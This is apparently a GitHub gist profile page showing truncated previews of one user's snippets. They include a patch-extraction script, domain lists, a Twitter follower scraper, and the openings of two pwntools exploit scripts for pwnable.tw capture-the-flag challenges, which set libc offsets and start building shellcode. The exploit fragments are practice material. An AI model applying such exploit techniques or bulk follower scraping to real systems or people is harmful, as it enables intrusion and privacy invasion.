Skip to content

Instantly share code, notes, and snippets.

View famasoon's full-sized avatar
🎯
Focusing

Ryota Sakai famasoon

🎯
Focusing
View GitHub Profile
@famasoon
famasoon / PatchExtract125.ps1
Created January 10, 2023 09:06 — forked from moshekaplan/PatchExtract125.ps1
Patch Extract v1.25 by Greg Linares (@Laughing_Mantis)
<#
================
PATCHEXTRACT.PS1
=================
Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis)
This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders.
Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64)
as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will

以下に記載する本やサイトを参考にして色々遊ぶとアンチウイルス企業のマルウェア解析とかの仕事を任せられるようになります。

順番はめちゃくちゃです(思い出した順に書いています)

なんか気になるのがあったら適当に手にとる感じでどうぞ。

import twint
def get_followers(username):
c = twint.Config()
c.Username = username
c.Profile_full = True
c.Store_csv = True
c.Output = "followers.csv"
twint.run.Followers(c)
@famasoon
famasoon / Makefile
Last active December 16, 2019 14:46
Makefile for compile golang and compress to zip binary for lambda
build: main.go
GOOS=linux GOARCH=amd64 go build -o hello
zip: build
zip handler.zip ./hello
*.37nhmdszo2ltkkfo.onion
*.56m4joozvkzlx6ln.onion
*.analytics.qklykfiomrwjhdz4.onion
*.api.37nhmdszo2ltkkfo.onion
*.api.dev.nytimes3xbfgragh.onion
*.api.nytimes3xbfgragh.onion
*.api.s5rhoqqosmcispfb.onion
*.api.stg.nytimes3xbfgragh.onion
*.blogs.nytimes3xbfgragh.onion
*.blogs.stg.nytimes3xbfgragh.onion
PATH=$(cd $(dirname $1);pwd)
echo $PATH
/bin/mkdir -p ${PATH}imges
/usr/local/bin/wrestool -x 1 -o ${PATH}images
/bin/mkdir -p output
/usr/local/bin/icotool -x -o output ${PATH}images/*
0-100.com
0-6.com
0-gold.net
00.net
000219.com
00042.com
0005pz.com
0006266.com
0007.net
000dn.com
from pwn import *
context(os='linux', arch='i386')
HOST = 'chall.pwnable.tw'
PORT = 10102
PRINT_NOTE_FN = 0x804862b
LIBC_READ_OFFSET = 0xd41c0
LIBC_SYSTEM_OFFSET = 0x3a940
from pwn import *
HOST = 'chall.pwnable.tw'
PORT = 10001
context(os='linux', arch='i386')
context.log_level = 'debug'
shell_code = asm('\n'.join([
'push %d' % u32('ag\0\0'),